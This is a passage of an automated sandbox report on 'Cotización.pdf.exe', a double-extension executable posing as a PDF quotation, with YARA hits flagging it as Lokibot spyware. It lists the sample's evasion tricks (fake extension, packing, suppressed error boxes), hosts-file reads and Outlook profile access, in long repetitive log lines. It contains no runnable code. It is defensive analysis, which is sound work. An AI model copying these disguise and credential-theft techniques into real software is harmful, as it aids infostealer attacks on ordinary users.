                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD7BC00_2_07AD7BC0
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD8FD80_2_07AD8FD8
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD93DA0_2_07AD93DA
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD87380_2_07AD8738
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADE3650_2_07ADE365
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADB7620_2_07ADB762
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADA3700_2_07ADA370
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD87480_2_07AD8748
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD47580_2_07AD4758
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADDAB90_2_07ADDAB9
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD9EE60_2_07AD9EE6
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD92290_2_07AD9229
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD92380_2_07AD9238
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD3A690_2_07AD3A69
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD8DA00_2_07AD8DA0
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD8D900_2_07AD8D90
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD58B10_2_07AD58B1
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADE0800_2_07ADE080
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD6CC60_2_07AD6CC6
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07AD6C6D0_2_07AD6C6D
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_0040549C16_2_0040549C
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_004029D416_2_004029D4
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: String function: 00405B6F appears 42 times
                Source: Cotizaci#U00f3n.pdf.exeBinary or memory string: OriginalFilename vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.299038998.0000000004752000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000000.202063347.0000000000FF2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename2S4BI4J3B.exe8 vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.302353740.0000000007830000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exe, 00000000.00000002.296416231.0000000003577000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResource_Meter.dll> vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exeBinary or memory string: OriginalFilename vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exe, 00000010.00000002.466815046.0000000000712000.00000002.00020000.sdmpBinary or memory string: OriginalFilename2S4BI4J3B.exe8 vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exeBinary or memory string: OriginalFilename2S4BI4J3B.exe8 vs Cotizaci#U00f3n.pdf.exe
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@135/3
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,16_2_0040650A
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,16_2_0040434D
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cotizaci#U00f3n.pdf.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe 'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess created: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe {path}Jump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Cotizaci#U00f3n.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                Data Obfuscation:

                barindex
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Cotizaci#U00f3n.pdf.exe.4738e18.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.Cotizaci#U00f3n.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 5436, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Cotizaci#U00f3n.pdf.exe PID: 1724, type: MEMORY
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_00FF328B push ebp; iretd 0_2_00FF32A6
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_00FF5168 push esp; iretd 0_2_00FF5169
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_01B46358 push ebp; iretd 0_2_01B4635A
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADECAD push ecx; retf 0_2_07ADECAF
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 0_2_07ADECA3 push ecx; retf 0_2_07ADECA5
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00402AC0 push eax; ret 16_2_00402AD4
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00402AC0 push eax; ret 16_2_00402AFC
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_00715168 push esp; iretd 16_2_00715169
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeCode function: 16_2_0071328B push ebp; iretd 16_2_007132A6
                Source: initial sampleStatic PE information: section name: .text entropy: 7.56769792307

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                Source: Possible double extension: pdf.exeStatic PE information: Cotizaci#U00f3n.pdf.exe
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
